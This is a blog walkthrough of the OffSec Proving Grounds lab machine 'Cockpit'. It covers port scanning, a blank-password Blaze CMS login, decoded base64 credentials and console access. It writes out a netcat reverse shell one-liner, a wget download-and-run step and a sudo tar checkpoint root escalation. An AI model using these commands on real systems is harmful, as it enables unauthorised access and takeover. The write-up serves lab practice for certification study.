Cockpit Walkthrough - Proving Grounds

Written By Sam Lewis

This was a fun box from OffSec. I'm not sure why it was rated as Intermediate though, I would have rated this one as easy. There was not really much to it other than default credentials and sudo binary priv esc. I booted up the machine and grabbed the IP address and added it to my environment.

export IP=192.168.218.10

I then ran two nmap scans. The first one being a scan for all open ports, the second one was a script and version scan on the ports that were found open.

nmap -p- $IP -o nmap.txt

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin

Nmap done: 1 IP address (1 host up) scanned in 53.94 seconds
nmap -sV -sC -p 22,80,9090 $IP

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp   open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: blaze
9090/tcp open  ssl/zeus-admin?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     
|||
|
|
|

I saw that there was a web server on port 80 and was unsure of what "zeus/admin" was, so I checked both of them in Firefox.

Upon first glance of port 80 I didn't really see anything worth while, so I decided to run dirbuster to see if I could find any other directories.

While this ran, I tried logging into port 9090 with common credentials such as admin:admin, admin:password, etc. I had no luck, so I checked back on the directory brute forcing. I saw that there was a login page for the web server on port 80. I immediately went to /login.php and was met with a login screen.

I tried common passwords here as well, but couldn't get in. So I took to Google to search "Blaze CMS Default Credentials". I found this site.

http://forum.codeigniter.com/printthread.php?tid=6725

I found a part in one of the posts talking about how there is no default password anymore for blaze. You just login.

So I typed in the user "admin" and didn't input a password and was able to login!

I saw two usernames and two passwords that were base64 encoded.

james 	Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=
cameron dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy

I grabbed the encoded passwords and decoded them in my terminal to reveal the plaintext passwords.

echo "Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=" | base64 -d

echo "dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy" | base64 -d
james:canttouchhhthiss@455152
cameron:thisscanttbetouchedd@455152

Now we have two usernames and passwords. I assumed that these credentials were for the server running on port 9090, so I went to port 9090 and input the james credentials.

I clicked Log In and was successfully logged in!

After some looking around, I noticed there was a "Terminal" option on the left hand side. I clicked on it and instantly had an interactive terminal as the user james!

I technically could have just used this terminal to finish the box, but I wanted a shell on my machine. So I created a reverse shell bash script and named it "cool.sh" and transferred it over to the target machine.


#cool.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.202 4444 >/tmp/f
#On my Kali machine
nc -nvlp 4444
python3 -m http.server 80

#On the target machine
wget http://192.168.45.202/cool.sh
chmod  +x cool.sh
./cool.sh

I transferred over the script using wget, made it executable, set up a netcat listener and ran the script to catch a reverse shell.

One of the first commands I ran was "sudo -l" to see if I could run anything as sudo. I was able to run one thing without a password!

Since this was a common binary, I went to GTFOBINS to see if there was an exploit for the tar binary using sudo.

There was an exploit for it! I needed to combine the command I was allowed to run with this command, which seemed easy enough to do.

sudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=1 --checkpoint-action=exec="/bin/sh"

Since the sudo command I was allowed to run was already creating an archive, I didn't need to include the /dev/null /dev/null, so all I needed to do was append the checkpoint flags to the end of the command and run it.

I ran the command and instantly got root! Just to reiterate, I didn't find this machine too terribly difficult and was definitely on the easier side. I tested the priv esc method on the terminal in port 9090 and was successful in that as well. So I could have gotten root access without creating a reverse shell on my machine. But generally these CTF's are for practicing for the OSCP exam, in which they expect you to have an interactive shell on your machine.

But, it is possible to get root on the terminal provided.

-Sam

Sam Lewis
Previous

Dibble Walkthrough - OffSec Proving Grounds
Next

GPEN Certification